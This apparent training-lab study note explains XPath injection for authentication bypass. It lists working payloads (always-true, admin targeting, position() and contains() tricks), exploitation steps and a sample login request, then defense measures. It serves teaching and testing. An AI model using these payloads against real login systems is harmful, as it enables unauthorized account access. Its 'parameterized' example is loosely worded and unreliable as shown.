XPath Injection - Authentication Bypass

Key Concepts

  1. What is XPath?

    • XPath is a query language for selecting nodes from an XML document.

    • It is often used in web applications for data retrieval and authentication mechanisms.

  2. What is XPath Injection?

    • An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.

XPath Query Example

Consider the following XML user data:

xmlCopyEdit<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>

Authentication might use the following query:

xpathCopyEdit/users/user[username/text()='USERNAME' and password/text()='PASSWORD']

If user input is unsanitized, injection becomes possible.

Common Payloads

  1. Universal True (Bypass Authentication):

    ' or '1'='1

    Resulting Query:

    /users/user[username/text()='' or '1'='1' and password/text()='']

  2. Target a Specific User (Admin):

    admin' or '1'='1

    Resulting Query:

    /users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']

  3. Use Position-Based Targeting:

    ' or position()=2 or '

Change the 2 to an 3 to Pivot to different account

' or position()=2 or '

  1. Resulting Query:

    /users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']

    • This targets the second user in the XML file (e.g., admin).

  2. Substring Matching:

    ' or contains(.,'admin') or '

    Resulting Query:

    /users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']

    • Searches for any user with "admin" in their username or other fields.

Steps to Exploit

  1. Analyze Application Behavior:

    • Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).

  2. Test for Injection Points:

    • Inject payloads into the username or password fields to observe server responses.

  3. Craft Payloads:

    • Use payloads like position() or contains() to refine your query targeting.

  4. Privilege Escalation:

    • Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.

Practical Exploitation Example

Payload to Target Admin (Second User):

username=' or position()=2 or '&password=irrelevant

Response Example:

  • Successfully logged in as WELCOME SUPERUSER!.

Defense Measures

  1. Sanitize Inputs:

    • Use proper input validation and encoding to prevent injection.

    • Reject special characters like ', ", [, and ].

  2. Parameterized Queries:

    • Avoid dynamically building XPath queries. Use parameterized XPath APIs:

      $query = "/users/user[username/text()=$username and password/text()=$password]";

  3. Hash Passwords:

    • Ensure passwords are hashed before storage and comparison.

  4. Error Messages:

    • Avoid detailed error messages that reveal query structures.

Key Takeaways

  • XPath Injection is similar to SQL Injection but targets XML queries.

  • Functions like position() and contains() can help refine targeting in complex scenarios.

  • Proper sanitization and secure coding practices are essential to mitigate these attacks.

Payloads to Remember

Scenario

Payload

Result

Bypass Authentication

' or '1'='1

Logs in as the first user.

Target Specific User (e.g., Admin)

admin' or '1'='1

Logs in as admin.

Position-Based User Targeting

' or position()=2 or '

Logs in as the second user.

Substring Matching (Admin)

' or contains(.,'admin') or '

Finds users with "admin" in username.

PreviousSQL Injection with sqlmapNextPayloads

Last updated